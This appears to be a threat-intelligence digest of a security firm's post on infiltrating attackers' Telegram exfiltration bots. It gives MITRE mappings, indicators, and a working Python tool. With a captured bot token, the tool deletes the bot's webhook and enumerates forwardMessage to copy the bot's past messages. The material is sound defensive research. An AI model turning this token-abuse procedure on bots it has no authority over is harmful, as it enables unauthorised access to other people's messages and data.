Key points
- Malicious packages frequently embed Telegram bot details that attackers use to receive exfiltrated data.
- Extracted bot credentials (bot token and chat ID) can be validated via the Telegram API (getMe), which confirms the token is live and returns the bot's identity (ID and username).
- The getUpdates endpoint reveals the chat IDs and message IDs of pending updates, the metadata needed to reference and forward messages; Telegram only returns updates that have not yet been confirmed, and keeps them for about 24 hours, so getUpdates alone does not reconstruct history.
- Forwarding a specific message (forwardMessage) requires the attacker's bot token, the attacker's chat ID (from_chat_id), a destination chat ID, and a valid message ID; iterating over message IDs recovers historical messages the bot delivered to the attacker.
- If the attacker configured a webhook to push updates to a web service, getUpdates is refused (HTTP 409 Conflict) until the webhook is removed. Investigators can either set their own webhook (which captures only new messages) or call deleteWebhook to return the bot to polling mode, then use getUpdates to learn current chat and message IDs and the forwardMessage walk to recover past messages.
- Successfully applied, these techniques can expose large volumes of exfiltrated files and identify impacted hosts.
MITRE Techniques
- [T1071.001] Application Layer Protocol: Web Protocols – Telegram API interactions performed over HTTPS (example command pattern quoted: ‘curl “https://api.telegram.org/bot{bot-token}/getMe”’).
- [T1041] Exfiltration Over C2 Channel – Attackers used Telegram bots to receive stolen data: ‘…malicious packages that exfiltrate victims’ data to them using Telegram bots.’
- [T1078] Valid Accounts – Use of the attacker’s Telegram bot token to authenticate API requests and access bot message data: ‘the attacker’s bot token’.
- [T1102] Web Service – Attackers redirected bot messages to an external webhook endpoint hosted on a web service: ‘hxxps[:]//a7d8a278870ff9da6427af6d9dfaa3d9.m.pipedream[.]net’.
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Analysts used command-line HTTP requests (curl) to query the Telegram API and automate message retrieval/forwarding (example pattern: ‘curl …/getUpdates’).
Indicators of Compromise
- [Telegram Bot Username] referenced in malware – trakinho_bot
- [Webhook Domain] webhook destination used by attacker – a7d8a278870ff9da6427af6d9dfaa3d9.m.pipedream[.]net
- [Bot Token] attacker bot credential (redacted example) – 6414966XXXXXXXXXXXXXXXX_X
- [Chat IDs] Telegram chat identifiers observed in API responses – 6200XXXXX (attacker's chat ID), 6348XXXXX (researcher's chat ID)
- [Message ID] message sequence index used to locate/forward messages – 2170 (example) and other incrementing IDs
Technical procedure (condensed):
Extract the Telegram bot details (bot token and attacker chat ID) from the malicious package and verify the token with the Telegram API's getMe endpoint; a successful response confirms the token is live and names the bot (for this case, the trakinho_bot username), but says nothing about who operates it. Next, send the bot a message and call getUpdates: the response shows your own chat ID and the current message ID, which serves as the upper bound for the enumeration that follows.
To retrieve messages the bot previously delivered to the attacker, call forwardMessage with from_chat_id set to the attacker's chat ID, chat_id set to the investigator's chat, and a candidate message_id. A 400 "Bad Request: message to forward not found" response means that ID is a gap (deleted, or never in that chat), so step to the next candidate; a 429 response carries a retry_after value that must be honoured before retrying the same ID. To recover history en masse, iterate message IDs from 1 up to the highest known value and forward each message that exists, so the attacker's receipts are reconstructed in the investigator's own chat.
If the bot is configured to deliver updates to an external webhook, getUpdates returns 409 Conflict. Investigators can either register their own webhook (which captures only new, future messages and is visible to the attacker) or call deleteWebhook to revert the bot to polling mode, after which getUpdates returns pending updates and the forwardMessage walk above recovers older messages. Both approaches rely on authenticated Bot API calls, careful handling of rate limits, and the fact that the attacker can see forwarded messages and webhook changes, so the collection window may be short.
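The procedure above, end to end, as an added example that is not the Checkmarx team's code: verify the token with getMe, fall back from a 409 Conflict to deleteWebhook, take the chat and message IDs from getUpdates, then walk forwardMessage over a message ID range while tolerating "not found" gaps and 429 rate limits. The HTTP transport is pluggable, so the same logic runs against api.telegram.org or against the constructed offline fake at the bottom; the token, chat IDs, bot username and message contents in the fake are placeholders, not data from the case.

```python
"""Telegram bot walk: getMe -> getUpdates (deleteWebhook on 409) -> forwardMessage.
Example code, not from the original post; all ids/tokens below are placeholders."""
import json
import time
import urllib.error
import urllib.parse
import urllib.request

API = "https://api.telegram.org"


def http_get(url):
    """Live transport. Telegram answers errors with HTTP 4xx but still sends a
    JSON body with ok/error_code/description, so parse both paths."""
    try:
        with urllib.request.urlopen(url, timeout=30) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as err:
        return json.load(err)


class BotWalker:
    def __init__(self, token, fetch=http_get):
        self.token, self.fetch = token, fetch

    def call(self, method, **params):
        url = f"{API}/bot{self.token}/{method}"
        if params:
            url += "?" + urllib.parse.urlencode(params)
        return self.fetch(url)

    def verify(self):
        """getMe: is the token live, and which bot does it belong to?"""
        r = self.call("getMe")
        if not r.get("ok"):
            raise RuntimeError(f"getMe failed: {r.get('description')}")
        return r["result"]["username"]

    def latest_update(self):
        """getUpdates needs polling mode: with a webhook set Telegram returns
        409 Conflict, and deleteWebhook flips the bot back. Returns (chat_id,
        message_id) of the newest pending message, or None when nothing is
        pending (Telegram keeps unconfirmed updates for roughly 24 hours)."""
        r = self.call("getUpdates")
        if r.get("error_code") == 409:
            self.call("deleteWebhook")
            r = self.call("getUpdates")
        msgs = [u["message"] for u in r.get("result", []) if "message" in u]
        if not msgs:
            return None
        m = max(msgs, key=lambda m: m["message_id"])
        return m["chat"]["id"], m["message_id"]

    def forward_range(self, from_chat, to_chat, lo, hi):
        """forwardMessage for every id in [lo, hi]: 400 means a gap (deleted or
        never in that chat), 429 carries retry_after to honour before retrying
        the same id, anything else is unexpected and stops the walk."""
        found, mid = [], lo
        while mid <= hi:
            r = self.call("forwardMessage", chat_id=to_chat,
                          from_chat_id=from_chat, message_id=mid)
            if r.get("ok"):
                found.append(mid)
            elif r.get("error_code") == 429:
                time.sleep(r.get("parameters", {}).get("retry_after", 1))
                continue                      # retry the same id
            elif r.get("error_code") != 400:
                raise RuntimeError(f"forwardMessage {mid}: {r.get('description')}")
            mid += 1
        return found


# ---- constructed offline stand-in for api.telegram.org (placeholder data) ----
ATTACKER_CHAT, MY_CHAT = 6200000001, 6348000001       # placeholder chat ids
STOLEN = {1: "hostname=WS01", 2: "passwords.txt", 4: "cookies.sqlite",
          5: ".env", 7: "wallet.dat"}                 # ids 3 and 6 are gaps


class FakeTelegram:
    def __init__(self):
        self.webhook_set = True          # attacker left a webhook in place
        self.throttled_once = False      # simulate a single 429 on id 2

    def __call__(self, url):
        parts = urllib.parse.urlparse(url)
        method = parts.path.rsplit("/", 1)[1]
        q = dict(urllib.parse.parse_qsl(parts.query))
        if method == "getMe":
            return {"ok": True, "result": {"id": 123456, "is_bot": True,
                                           "username": "example_bot"}}
        if method == "deleteWebhook":
            self.webhook_set = False
            return {"ok": True, "result": True}
        if method == "getUpdates":
            if self.webhook_set:
                return {"ok": False, "error_code": 409,
                        "description": "Conflict: can't use getUpdates method "
                                       "while webhook is active"}
            # the one pending update: the investigator's own /start to the bot
            return {"ok": True, "result": [{"update_id": 1, "message": {
                "message_id": 8, "chat": {"id": MY_CHAT}, "text": "/start"}}]}
        if method == "forwardMessage":
            mid = int(q["message_id"])
            if mid == 2 and not self.throttled_once:
                self.throttled_once = True
                return {"ok": False, "error_code": 429, "description":
                        "Too Many Requests", "parameters": {"retry_after": 0}}
            if int(q["from_chat_id"]) != ATTACKER_CHAT or mid not in STOLEN:
                return {"ok": False, "error_code": 400,
                        "description": "Bad Request: message to forward not found"}
            return {"ok": True, "result": {"message_id": 100 + mid,
                                           "chat": {"id": int(q["chat_id"])}}}
        return {"ok": False, "error_code": 404, "description": "Not Found"}


def walk(token="123456:PLACEHOLDER", fetch=None):
    """Run the whole procedure; defaults to the fake, pass fetch=http_get to go live."""
    bot = BotWalker(token, fetch or FakeTelegram())
    username = bot.verify()
    pending = bot.latest_update()
    if pending is None:
        raise SystemExit("no pending updates: message the bot first, then retry")
    my_chat, top_id = pending              # our chat id, and the id ceiling
    recovered = bot.forward_range(ATTACKER_CHAT, my_chat, 1, top_id)
    return username, my_chat, recovered


if __name__ == "__main__":
    print(walk())                          # ('example_bot', 6348000001, [1, 2, 4, 5, 7])
```

Against the live API, `walk("<token>", http_get)` performs the same steps; note that every forwarded message appears in the attacker's chat as a forward and that deleting the webhook is visible to them, so run the enumeration in one pass rather than probing interactively.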
Read more: https://checkmarx.com/blog/how-we-were-able-to-infiltrate-attacker-telegram-bots/